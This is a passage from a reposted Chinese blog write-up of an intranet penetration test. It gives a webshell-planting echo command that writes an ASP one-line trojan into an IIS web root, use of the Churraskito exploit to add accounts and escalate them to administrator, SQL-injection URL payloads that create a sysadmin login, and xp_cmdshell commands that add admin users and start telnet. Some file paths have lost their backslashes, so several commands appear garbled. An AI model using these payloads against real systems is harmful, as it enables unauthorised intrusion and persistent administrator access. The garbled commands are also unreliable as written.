记一次内网渗透测试经历
作者:网络转载 发布时间:[ 2014/5/26 13:22:32 ] 推荐标签:渗透测试 安全测试 测试技术
针对思路二:
既然是通过上传一个文件,那么首先要做的工作是找各种上传路径,在前台摸索了半天也没有找到一个可以上传的功能,而后使用后台上传功能,通过找各种后台,其中发现个admin这个后台,无奈,用户名和密码均无法通过验证,从数据库里面看,也没有相应的用户名和密码,所以这个后台基本上是个无效的后台,没办法,眼看着上传这条路要失效了,此时我又使用了webcruiser 对整个网站扫描了下,发现该软件有cmd模式,而且能够执行成功,此时思路来了,既然应用程序前后台均无法上传,何不在这里直接使用cmd命令来建立一个asp文件呢?当然前提是要知道web虚拟路径在哪里。
一般情况下,web虚拟路径通常是这样的:C:inetpubwwwroot ;D:inetpubwwwroot ;
或者E:inetpubwwwroot 等 这几个路径,而虚拟可以执行的目录一般是C:inetpubscripts ;D:inetpubscripts ; E:inetpubscripts
接下来,我在cmd命令下,直接执行一条命令:
echo ^<^%execute^(request^("eval"^)^)^%^> c:inetpubwwwrootcms est123456.asp
在这个目录下,生成了个一句话木马asp文件,然后再使用菜刀连接,ok,webshell拿到。
得到webshell 不是主要的,而且webshell 也没有什么太大的作用,因此尝试使用webshell往相应目录传送我们的攻击文件,尝试了几个目录均没有发现可以执行的目录,在快要放弃的情况下,然后尝试了C:
ecycle这个目录,发现可以上传可以执行的文件,下面简单了。
接下来的思路很简单,是上传一个后面软件,执行系统权限添加操作。在做到过程中,还是遇到了不少困难,例如,开始上传的瑞士军刀,想通过反弹端口来执行我们添加用户的操作,发现无法成功。
在后来,通过一些0day的溢出漏洞来取得系统权限,在网上搜罗了一大堆的0day软件,均发现不可以利用,后来看到“巴西烤肉”这款软件,英文名Churraskito.exe,这款0day溢出软件是如此的强大,而且我下的这个还么有后门,直接执行Churraskito “C:windowssystem32cmd.exe ” “net user 111 111/add”成功添加用户,哈哈,当然如果你想加到管理员组,在使用Churraskito “C:windowssystem32cmd.exe ” “net localgroup administrators 111 /add” 基本上ok了,至此,一个简单的获取系统权限的渗透测试算完成了。
这里直接用webcruiser 中的cmd命令,直接执行添加用户操作可以了,省去了后面的一系列操作。擦得,后来才想到的,唉。。。
思路三:
既然可以执行,未必非要xp_cmdshell ,我们可以通过尝试sa,这个操作,例如,先在数据库中建立一个用户,然后把该用户提升为sysadmin,之后在使用查询分析器连接,当然还是要使用xp_cmdshell 的存储过程。
具体方法如下:
首先建立数据库用户:
?id=1234;exec master.dbo.sp_addlogin user;
当然也可以为这个用户赋予密码,其实无所谓,如果赋予密码的话,这样操作:
?id=1234;exec master.dbo.password null ,password ,user;
这里的null是旧密码,password 为新密码。
然后将该用户提升权限:
?id=1234;exec master.dbo.sp_addsrvrolemember user,sysadmin;
提升成功后,可以通过查询分析器连接,连接成功后,直接查看xp_cmdshell是否能用;如果能用,则直接提升权限操作,;例如:
Xp_cmdshell ‘net user’
Xp_cmdshell ‘net user test123 test123 /add’
Xp_cmdshell ‘net localgroup administrators test123/add ’
Xp_cmdshell ‘net user test123 /del’
等。
开启telnet服务:
Xp_cmdshell ‘net start tlntsvr’
总结:
在这期间,我知道了webshell 和shell 不是一回事,也知道了xp_cmdshell是可以获取系统权限的,也知道了 有些工具是可以执行cmd命令的,当然我也初步了解下瑞士军刀 巴西烤肉等一系列攻击工具的用法,当然也了解到一些系统是可以被0day的。虽然这次渗透还有很多没有了解的地方,虽然只是大致的了解下,但是,对以后这方面,应该有个很好的思路以及借鉴。安全这块,任重而道远,以此勉励自己。
相关推荐
更新发布
功能测试和接口测试的区别
2023/3/23 14:23:39如何写好测试用例文档
2023/3/22 16:17:39常用的选择回归测试的方式有哪些?
2022/6/14 16:14:27测试流程中需要重点把关几个过程?
2021/10/18 15:37:44性能测试的七种方法
2021/9/17 15:19:29全链路压测优化思路
2021/9/14 15:42:25性能测试流程浅谈
2021/5/28 17:25:47常见的APP性能测试指标
2021/5/8 17:01:11